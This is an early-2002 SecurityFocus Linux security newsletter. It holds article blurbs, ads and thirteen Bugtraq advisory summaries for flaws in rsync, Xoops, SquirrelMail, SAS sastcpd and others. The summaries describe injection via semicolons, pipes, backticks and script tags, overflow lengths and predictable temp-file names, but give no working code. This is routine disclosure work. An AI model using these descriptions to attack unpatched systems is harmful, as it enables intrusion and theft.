SecurityFocus Linux Newsletter #66 ---------------------------------- This issue is sponsored by SecurityFocus (http://www.securityfocus.com) **SecurityFocus Promotion: Two Week Trial of SIA** SecurityFocus(tm), a leading provider of enterprise security threat management systems, announces new pricing for SIA(tm) our Security Intelligence Alert Service. We are also offering a FREE two-week trial of SIA between January 21st and March 15th, 2002. SIA provides the most comprehensive and customizable vulnerability and malicious code alerts available. SIA delivers complete, up-to-the-minute, specific, actionable information that allows enterprises to prevent attacks before they occur. SIA allows you to: **Fully protect your systems with comprehensive alerts that are specific to your infrastructure. SIA allows you to specify down to the version level those products for which you wish to receive alerts. **Reduce the threat of network downtime from attacks. SIA provides everything you need to know: thorough technical description of the attack, workarounds or available patches, signatures for updating IDSs, mitigation/disinfection strategies, etc. **Save hours a day by not having to look through hundreds of emails or dozens of websites. SIA allows you to prioritize your current vulnerabilities and eliminate the highest risks first. To take advantage of our FREE two-week trial offer and receive real-time configuration-specific vulnerability and malicious code alerts, please call toll-free 1-866-577-6300 in the United States and Canada, or +1-650-655-6300 outside North America. You may also contact us at sales@securityfocus.com , or click here http://www.securityfocus.com/feedback to have a sales representative contact you. ------------------------------------------------------------------------------- I. FRONT AND CENTER 1. SecurityFocus is Hiring! 2. Castles Built on Sand: Why Software is Insecure 3. Understanding IDS Active Response Mechanisms 4. Reject the Corporate Secrecy Grab 5. Special Event: Information Security in the Age of Terrorism II. LINUX VULNERABILITY SUMMARY 1. rsync Signed Array Index Remote Code Execution Vulnerability 2. Xoops Remote SQL Injection Vulnerability 3. Xoops Private Message Box Cross-Site Scripting Vulnerability 4. AHG Search Engine Search.CGI Arbitrary Command Execution... 5. Sun Java Virtual Machine Segmentation Violation Vulnerability 6. Xoops Private Message System Cross-Site Scripting Vulnerability 7. SAS SASTCPD Command Line Argument Buffer Overflow Vulnerability 8. SAS SASTCPD Command Format String Vulnerability 9. PhpSmsSend Remote Shell Command Execution Vulnerability 10. fwmon Oversized Packet Denial of Service Vulnerability 11. BRU SetLicense Script Insecure Temporary File Symbolic Link... 12. SquirrelMail SquirrelSpell Remote Shell Command Execution... 13. SquirrelMail Malicious HTML Formatted Email Vulnerability III. LINUX FOCUS LIST SUMMARY 1. apache and nimbda (Thread) 2. Mitigating SYN flooding with Netfilter or net.ipv4.tcp_syn... IV. NEW PRODUCTS FOR LINUX PLATFORMS 1. BRU Backup and Restore Utility 2. AntiViral Toolkit Pro (AVP) Z.E.S. Linux 3. Guardian Digital Linux Lockbox V. NEW TOOLS FOR LINUX PLATFORMS 1. SILC (Secure Internet Live Conferencing)(Toolkit) v0.7.3 2. EnderUNIX spamGuard v1.0 3. Wolverine Firewall v.99a 4. Appcap v0.12 VI. SPONSORSHIP INFORMATION I. FRONT AND CENTER ------------------- 1. SecurityFocus is Hiring! SecurityFocus is currently looking for a programmer/debugger for its Threat Analysis teams. This position requires skillsets which I have outlined below. These positions require the staff members to be located in Calgary, Alberta, Canada. Relocation assistance is possible from within Canada. Skills will require verification by the way of an actual practical test before an in-person interview is secured. Skills required: - Expertise with SoftICE & IDA Pro (or similar tools). - Expertise with x86 assembly language - Programming ability in C & C++, targeting both the Unix and Windows platforms - Strong report writing skills and ability to interface with customers. Additional skills preferred: - Working knowledge of computer viruses, worms, and trojans propagation techniques - Working knowledge of honeypots. Personal Skills Required: Any applicant must be able to work in a team environment and deal with very tight deliverables. An outgoing pleasant personality is an absolute requiremant. No rockstars, no primadonas. About SecurityFocus SecurityFocus, is the leading provider of security intelligence products and services for business. They include SIA (Security Intelligence Alert), which alerts subscribers to security vulnerabilities, and ARIS (Attack Registry & Intelligence Service), which predicts cyber assaults on customer networks, based on global attack data. SecurityFocus also licenses the world's largest and most comprehensive vulnerability information database, hosts the most popular security community mailing list on the Internet, Bugtraq, and publishes original security content on its Web site. Please send resumes if interested to Alfred Huger ah@securityfocus.com 2. Castles Built on Sand: Why Software is Insecure by Josh Ryder Software developers spend endless hours developing sophisticated programs that will make users' lives easier and more productive. Unfortunately, the outcome is not always what the developers had in mind. Many software programs are plagued by programming flaws that may lead to security vulnerabilities. This article will offer a brief overview of some of the factors that may contribute to insecure software. http://www.securityfocus.com/infocus/1541 3. Understanding IDS Active Response Mechanisms by Jason Larsen, and Jed Haile Debates still rage in the developer community over which methods of detecting attackers are best, but IDS customers as a whole are satisfied with the current IDS technology. To get an edge on the competition, many of the IDS vendors are adding active response capabilities to their products. The concept underlying this tactic is that the IDS will detect an attacker and then move to stop his attack. The problem is that any attacker with a basic knowledge of TCP/IP can easily defeat these mechanisms directly or simply knock the network offline often enough that the Admin is forced to turn off the feature. It is important for Admins to know the limitations of active response mechanisms to avoid being blindsided by them. http://www.securityfocus.com/infocus/1540 4. Reject the Corporate Secrecy Grab By David Banisar In the name of improving cyber security, corporations are pushing for exemptions to the U.S. Freedom of Information Act (FOIA) that are unnecessary and dangerous. These will result in crucial information being suppressed without improving security. http://www.securityfocus.com/columnists/56 5. Special Event: Information Security in the Age of Terrorism (March 25-26, 2002, Washington DC) Join an impressive faculty to learn strategic tools to safeguard your trade secrets and assets at Financial Research Associates' conference on Information Security in the Age of Terrorism, March 25-26 in Washington DC. Learn about the burgeoning relationships between terrorist organizations and hackers, the impact of better funded and organized hackers, how to protect your organization and much more. This event focuses on practical security strategies with practitioner case studies and features an all-star faculty. To see a detailed conference brochure, go to www.frallc.com , or call for more information at 800-280-8440. II. BUGTRAQ SUMMARY ------------------- 1. rsync Signed Array Index Remote Code Execution Vulnerability BugTraq ID: 3958 Remote: Yes Date Published: Jan 25 2002 12:00A Relevant URL: http://www.securityfocus.com/bid/3958 Summary: The rsync program is used to synchronize files and directory structures across a network. It is commonly used to maintain mirrors of ftp sites, often through anonymous access to the rsync server. It is available for Linux and other Unix operating systems. rsync is usually configured to run as the root user. A vulnerability exists within some versions of rsync. Under some circumstances, a remotely supplied signed value is used as an array index. If a negative value is used as an array index, it is possible to access nearly arbitrary memory locations. It has been reported that this may only be used to write NULL bytes to memory. If a remote attacker is able to exploit this vulnerability, they may write NULL bytes to arbitrary locations on the stack. This could lead to the corruption of data used to restore an instruction pointer, which in turn would modify the flow of execution of the program. If successfully exploited, this would result in the execution of arbitrary code as the root user. It is possible that other versions of rsync share this vulnerability. 2. Xoops Remote SQL Injection Vulnerability BugTraq ID: 3977 Remote: Yes Date Published: Jan 29 2002 12:00A Relevant URL: http://www.securityfocus.com/bid/3977 Summary: Xoops is open-source, freely available web portal software written in object-oriented PHP. It is back-ended by a MySQL database and will run on most Unix and Linux distributions. A vulnerability exists in the script userinfo.php, included with Xoops. It includes user supplied input in a SQL statement, and fails to correctly escape special characters. As a result, it is possible to modify and subvert the original query. Exploitation of this vulnerability may result in the disclosure of sensitive information. Additionally, error messages resulting from the SQL statement are passed to the remote user. This may leak additional, valuable information about the structure of the SQL statement. 3. Xoops Private Message Box Cross-Site Scripting Vulnerability BugTraq ID: 3981 Remote: Yes Date Published: Jan 29 2002 12:00A Relevant URL: http://www.securityfocus.com/bid/3981 Summary: Xoops is open-source, freely available web portal software written in object-oriented PHP. It is back-ended by a MySQL database and will run on most Unix and Linux distributions. Xoops includes a Private Message System for users, so that they may send messages to one another. The script pmlite.php is used to access this system. This script does not properly escape user supplied data, and is vulnerable to a cross-site scripting attack. Script tags may be submitted as part of the image parameter. When another user views this page, the malicious script code will be executed on that user in the context of the site running Xoops. This issue may be exploited by an attacker to steal a legitimate user's cookie-based authentication credentials, among other things. 4. AHG Search Engine Search.CGI Arbitrary Command Execution Vulnerability BugTraq ID: 3985 Remote: Yes Date Published: Jan 29 2002 12:00A Relevant URL: http://www.securityfocus.com/bid/3985 Summary: Search.CGI is a component of the HTMLsearch Search Engine software distributed by AHG. The software is available for the Unix, Linux, and Microsoft platforms. A problem with the script could make it possible for a remote user to execute arbitrary commands. The problem is in the filtering of input. The search.cgi script included with the AHG Search Engine does not adequately filter input. Due to lack of sufficient input sanitization, it is possible for a remote user to pass semi-colon (;) and pipe (|) characters through a search request. This can result in the commands encapsulated between the symbols being executed with the privileges of the web server. This problem makes it possible for a remote user to execute arbitrary commands on a vulnerable system. On UNIX systems, this would likely be as an unprivileged user. On Microsoft systems, these commands may be executed with SYSTEM privileges. 5. Sun Java Virtual Machine Segmentation Violation Vulnerability BugTraq ID: 3992 Remote: No Date Published: Jan 30 2002 12:00A Relevant URL: http://www.securityfocus.com/bid/3992 Summary: Java programs run in an intepreted environment, the Java Virtual Machine (JVM). Sun has provided a reference JVM implementation for multiple platforms, including Solaris, Windows and Linux. A possible vulnerabilty exists in the Sun JVM. It is possible for a maliciously constructed java program to cause a segmentation fault, crashing the virtual machine. This should not be possible with valid java bytecode. In a shared environment, a malicious user able to contribute and execute compiled java code may be able to exploit this vulnerability to create a denial of service attack. For example, user contributed code may be executed within the context of a java based web server shared across multiple domains, or shared code used by a JINI system. The ability to deterministically crash the JVM has been demonstrated on the Linux implementation of the Sun JVM. Other implementations may share this vulnerability. 6. Xoops Private Message System Cross-Site Scripting Vulnerability BugTraq ID: 3978 Remote: Yes Date Published: Jan 29 2002 12:00A Relevant URL: http://www.securityfocus.com/bid/3978 Summary: Xoops is open-source, freely available web portal software written in object-oriented PHP. It is back-ended by a MySQL database and will run on most Unix and Linux distributions. Xoops includes a Private Message System for users, so that they may send messages to one another. The Title: field of the Private Message System does not sufficiently filter HTML tags. This makes it possible for an attacker to supply malicious input for the Title: field which contains arbitrary script code. When another user receives the attacker's private message, the malicious script code will be executed on that user in the context of the site running Xoops. This issue may be exploited by an attacker to steal a legitimate user's cookie-based authentication credentials, among other things. 7. SAS SASTCPD Command Line Argument Buffer Overflow Vulnerability BugTraq ID: 3979 Remote: No Date Published: Jan 29 2002 12:00A Relevant URL: http://www.securityfocus.com/bid/3979 Summary: sastcpd is a "Job Spawner" included with the base installation of the SAS Software infrastructure. It is available for various platforms. This issue affects systems running the Unix, Linux, and Microsoft operating systems. A problem with the software could make it possible for a local user to gain elevated privileges. The problem is the handling of long in command line arguments. A problem has been discovered in the sastcpd program. sastcpd is a job spawning program included with the SAS Base product. By default, it is installed setuid root. When sastcpd is executed with a command line argument of 1200 characters, a buffer overflow occurs. This overflow can result in the overwriting of stack variables, including the return address, and the execution of arbitrary code. As the sastcpd program is installed setuid root, the code will be executed with administrative privileges. This problem makes it possible for a local user to gain administrative access. 8. SAS SASTCPD Command Format String Vulnerability BugTraq ID: 3980 Remote: No Date Published: Jan 29 2002 12:00A Relevant URL: http://www.securityfocus.com/bid/3980 Summary: sastcpd is a "Job Spawner" included with the base installation of the SAS Software infrastructure. It is available for various platforms. This issue affects systems running the Unix, Linux, and Microsoft operating systems. A problem with the software could make it possible for a local user to gain elevated privileges. The problem is the handling of format strings. A problem has been discovered in the sastcpd program. sastcpd is a job spawning program included with the SAS Base product. By default, it is installed setuid root. sastcpd is vulnerable to a format string attack. When executed with a command line argument of a format string, it is possible to overwrite arbitrary addresses in memory. This can result in the execution of arbitrary code. As the sastcpd program is installed setuid root, the code will be executed with administrative privileges. This problem makes it possible for a local user to gain administrative access. 9. PhpSmsSend Remote Shell Command Execution Vulnerability BugTraq ID: 3982 Remote: Yes Date Published: Jan 29 2002 12:00A Relevant URL: http://www.securityfocus.com/bid/3982 Summary: PhpSmsSend is a front end to the SmsSend program, and allows users to send SMS messages through a web interface. SmsSend is available for Linux and Microsoft Windows. PhpSmsSend accepts a message to send as a user supplied CGI parameter. This data is then used to build a command calling SmsSend. PhpSmsSend does not properly validate user input used in this manner. A malicious party may include escape characters such as ` in the input, and execute additional, arbitrary shell commands. Exploitation of this vulnerability could lead to arbitrary code being executed as the script user, generally 'nobody'. This could lead to local access to the vulnerable system, from which point futher elevated privileges may be easier to obtain. 10. fwmon Oversized Packet Denial of Service Vulnerability BugTraq ID: 3984 Remote: Yes Date Published: Jan 25 2002 12:00A Relevant URL: http://www.securityfocus.com/bid/3984 Summary: fwmon is a firewall monitoring tool. It works with the Linux operating system, and either iptables or ipchains. It is able to provide more detailed information on network traffic than the standard ipchains log. It is possible for some versions of fwmon to crash when the kernel sends an oversized packet. If an attacker were able to exploit this condition, it may be possible to create a denial of service condition. If firewall monitoring is disrupted, further attacks against the host would go undetected. This would not impact the effectiveness of the firewall, only the quality of the log data. 11. BRU SetLicense Script Insecure Temporary File Symbolic Link Vulnerability BugTraq ID: 3970 Remote: No Date Published: Jan 26 2002 12:00A Relevant URL: http://www.securityfocus.com/bid/3970 Summary: BRU is a commercially available backup software infrastructure available for both UNIX and Linux Operating Systems. It is distributed and maintained by the Tolis Group. A problem with the software could make it possible for a local user to overwrite system files. This problem is in the creation of temporary files. When BRU executes, it creates temporary files insecurely. When the setlicense script is executed, a couple problems occur that could lead to the overwriting of system files. This is due first to the fact that setlicense uses an easily predicted filename for the storage of data in the temporary directory. Upon execution, setlicense stores data in the file /tmp/brutest.$$, where $$ signifies the process id of the current shell. Secondarily, the setlicense script does not perform adequate checks in the temporary file prior to attempting to create and write to the file. The setlicense script neglects to check for the existence of the file it is attempting to write to, and thus can be tricked into overwriting root owned files through symbolic links. This makes it possible for a local user to overwrite arbitrary root owned files, and could potentially lead to denial of service, or local elevated privileges. 12. SquirrelMail SquirrelSpell Remote Shell Command Execution Vulnerability BugTraq ID: 3952 Remote: Yes Date Published: Jan 24 2002 12:00A Relevant URL: http://www.securityfocus.com/bid/3952 Summary: SquirrelMail is a feature rich webmail program implemented in the PHP4 language. It is available for Linux and Unix based operating systems. SquirrelMail allows for extended functionality through a plugin system. One of the plugins included with SquirrelMail is SquirrelSpell, a spellchecker script. A vulnerability exists if a remote user is able to directly access the spellchecker PHP script. Global variables used to construct a shell command are not initialized within this script. If they are supplied as CGI parameters, they may be defined with user supplied input. As a result, a remote user can call this script with additional shell commands included in these variables. The shell commands will then be executed as the web server, generally as the user nobody. From this point, it may be possible to gain local access to the machine as the non-privileged user 'nobody'. Earlier versions of SquirrelSpell may share this vulnerability. 13. SquirrelMail Malicious HTML Formatted Email Vulnerability BugTraq ID: 3956 Remote: Yes Date Published: Jan 24 2002 12:00A Relevant URL: http://www.securityfocus.com/bid/3956 Summary: SquirrelMail is a feature rich webmail program implemented in the PHP4 language. It is available for Linux and Unix based operating systems. A vulnerability exists in some versions of SquirrelMail. If a user chooses to view HTML formatted email, some malicious HTML tags may be included. These tags may include JavaScript, which could lead to some form of a cross site scripting attack. Additionally, an external reference may be constructed with a relative link to another SquirrelMail script. If CGI parameters are included in this link, and user authentication is being handled through an automated mechanism such as cookies, it may be possible to take actions as the user on the SquirrelMail system. It has been reported that it is possible to access the compose.php script in this manner, and send new email as the vulnerable user. III. LINUX FOCUS LIST SUMMARY --------------------------------- 1. apache and nimbda (Thread) Relevant URL: http://www.securityfocus.com/cgi-bin/archive.pl?id=91&mid=20020130220245.L26840@jensbenecke.de&threads=1 2. Mitigating SYN flooding with Netfilter or net.ipv4.tcp_syncookies ? (Thread) Relevant URL: http://www.securityfocus.com/cgi-bin/archive.pl?id=91&mid=13CFD9ED17AAD411982B00D0B76DFB8A013705A9@WHEAT&threads=1 IV.NEW PRODUCTS FOR LINUX PLATFORMS ---------------------------------------- 1. BRU Backup and Restore Utility by Enhanced Software Technologies Platforms: Solaris Relevant URL: http://www.bru.com/ Summary: BRU has been providing Backup You Can Trust[SM] to the Unix community since 1985 and for Linux since 1994. This software is provides a backup solution to UNIX/Linux on multiple platforms and architectures. 2. AntiViral Toolkit Pro (AVP) Z.E.S. Linux by Kaspersky Labs Platforms: Linux Relevant URL: http://www.kasperskylabs.com/ Summary: AntiViral Toolkit Pro (AVP) Z.E.S. Linux is a distributive package containing Linux-based bootable rescue diskette with pre-installed anti-virus software - AVP for Linux. It is a unique tool, which allows fast and efficient restoring of booting ability of a computer affected by a virus attack. It also makes possible to actively neutralise computer viruses invisible for many anti-virus products on infected systems. 3. Guardian Digital Linux Lockbox by Guardian Digital, Inc. Platforms: Linux Relevant URL: http://www.guardiandigital.com/lockbox.html Summary: The Guardian Digital Linux Lockbox is the first open source network server appliance designed to serve as a complete e-business solution. Powering the Lockbox is EnGarde, Guardian Digital's Linux, engineered to achieve the level of security required to conduct e-business. V. NEW TOOLS FOR LINUX PLATFORMS -------------------------------- 1. SILC (Secure Internet Live Conferencing)(Toolkit) v0.7.3 by Priikone Relevant URL: http://silcnet.org/ Platforms: Linux, UNIX Summary: SILC (Secure Internet Live Conferencing) is a protocol which provides secure conferencing services in the Internet over insecure channels. SILC superficially resembles IRC, although they are very different internally. The purpose of SILC is to provide secure conferencing services. Strong cryptographic methods are used to secure all traffic. The SILC is delivered as SILC Client for end users, SILC Server for system administrators, and SILC Toolkit for application developers. 2. EnderUNIX spamGuard v1.0 by EnderUNIX Team Relevant URL: http://www.enderunix.org/spamguard/ Platforms: Linux, POSIX, UNIX Summary: spamGuard is a small application that automagically monitors spammer activity in mail server logs. For the time being, the program supports the qmail MTA and features multilog logging. 3. Wolverine Firewall v.99a by Terry Varga wolverine@webworxmedia.com Relevant URL: http://webworxmedia.com/Wolverine/ Platforms: Linux Summary: Wolverine Firewall is a set of shell scripts designed to step you through the setup of IPTABLES firewalling for servers. 4. Appcap v0.12 by Paul Starzetz Relevant URL: http://appcap.ihaquer.com/ Platforms: Linux Summary: Appcap is a tricky application for x86 Linux which allows an user with enough power (usually the superuser) on a machine to attach and redirect standard input and output of any application to his/her actual tty. In this way the superuser obtains an instrument for looking into ordinary users' sessions. This may be very useful if you suspect some of your users of doing nasty things from your machine. VI. SPONSORSHIP INFORMATION --------------------------- This issue is sponsored by SecurityFocus (http://www.securityfocus.com) **SecurityFocus Promotion: Two Week Trial of SIA** SecurityFocus(tm), a leading provider of enterprise security threat management systems, announces new pricing for SIA(tm) our Security Intelligence Alert Service. We are also offering a FREE two-week trial of SIA between January 21st and March 15th, 2002. SIA provides the most comprehensive and customizable vulnerability and malicious code alerts available. SIA delivers complete, up-to-the-minute, specific, actionable information that allows enterprises to prevent attacks before they occur. SIA allows you to: **Fully protect your systems with comprehensive alerts that are specific to your infrastructure. SIA allows you to specify down to the version level those products for which you wish to receive alerts. **Reduce the threat of network downtime from attacks. SIA provides everything you need to know: thorough technical description of the attack, workarounds or available patches, signatures for updating IDSs, mitigation/disinfection strategies, etc. **Save hours a day by not having to look through hundreds of emails or dozens of websites. SIA allows you to prioritize your current vulnerabilities and eliminate the highest risks first. To take advantage of our FREE two-week trial offer and receive real-time configuration-specific vulnerability and malicious code alerts, please call toll-free 1-866-577-6300 in the United States and Canada, or +1-650-655-6300 outside North America. You may also contact us at sales@securityfocus.com , or click here http://www.securityfocus.com/feedback to have a sales representative contact you. -------------------------------------------------------------------------------